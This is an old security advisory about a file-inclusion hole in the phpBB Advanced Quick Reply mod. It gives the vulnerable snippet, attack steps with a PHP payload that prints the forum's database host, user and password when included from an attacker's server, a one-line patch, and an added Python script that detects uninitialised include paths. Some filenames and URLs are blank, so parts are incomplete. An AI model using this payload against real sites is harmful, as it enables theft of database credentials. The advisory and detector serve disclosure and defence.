Code Injection in phpBB Advanced Quick Reply Mod

by Nikola Strahija on November 13th, 2002

A security hole (code injection) was found in this software. You can download this software at

Hackers can exploit this Mod to inject shell code to hack your forum, your website or your server (local exploit), because code injection is a dangerous technique used by hackers.

Exploit: (quick_reply.php)

if ( $mode == 'smilies' )
{
	define('IN_PHPBB', true);
	// $phpbb_root_path is not set anywhere before these includes
	include($phpbb_root_path . '');
	include($phpbb_root_path . 'common.'.$phpEx);
	include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
	generate_smilies('window', PAGE_POSTING);
}

You can then make a PHP file named '' to be included in order to access that forum. Example:

echo "DB Type: $dbms\n";
echo "DB Host: $dbhost\n";
echo "DB Name: $dbname\n";
echo "DB User: $dbuser\n";
echo "DB Pass: $dbpasswd\n";

After that, you upload this file to your server (http://[Your Server]/ and enter URL
You will receive all the DB info of the forum.

Patch: (quick_reply.php)

// Set the include root explicitly so it is defined before the include() calls
if ( $mode == 'smilies' )
	$phpbb_root_path = "./";
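
A per-file audit check for the pattern the patch closes, added here as an example (it is not code from the original advisory or from phpBB): it flags every include/require whose path starts with a variable that the file has not assigned before that point. The function name, regexes and the two sample snippets are assumptions, constructed from the snippets above.

```python
import re

# include/require(_once) whose path expression starts with a PHP variable
INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*\$(\w+)')
# plain assignment "$name = ..." (not ==, ===, => or .=)
ASSIGN_RE = re.compile(r'\$(\w+)\s*=(?![=>])')

# Constructed samples, abridged from the advisory's vulnerable and patched snippets
VULNERABLE = """<?php
if ( $mode == 'smilies' )
{
    define('IN_PHPBB', true);
    include($phpbb_root_path . 'common.'.$phpEx);
    include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
}
"""
PATCHED = """<?php
if ( $mode == 'smilies' )
{
    $phpbb_root_path = "./";
    define('IN_PHPBB', true);
    include($phpbb_root_path . 'common.'.$phpEx);
    include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
}
"""

def find_uninitialised_includes(php_source):
    """Return [(line_no, variable)] for includes whose leading path variable
    has no earlier assignment in the same file.

    Limits: looks at one file only, does not follow included files, and
    counts any assignment as initialisation, even one from request data."""
    assigned, findings = set(), []
    for line_no, line in enumerate(php_source.splitlines(), 1):
        if line.lstrip().startswith(('//', '#', '*')):
            continue  # skip comment-only lines
        events = [(m.start(), 'assign', m.group(1)) for m in ASSIGN_RE.finditer(line)]
        events += [(m.start(), 'include', m.group(1)) for m in INCLUDE_RE.finditer(line)]
        for _pos, kind, name in sorted(events):  # left to right within the line
            if kind == 'assign':
                assigned.add(name)
            elif name not in assigned:
                findings.append((line_no, name))
    return findings

if __name__ == "__main__":
    print("vulnerable:", find_uninitialised_includes(VULNERABLE))
    print("patched:   ", find_uninitialised_includes(PATCHED))
```

Only the leading variable of the path is checked, because it decides where the included file is loaded from; a trailing variable such as `$phpEx` only changes the extension.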
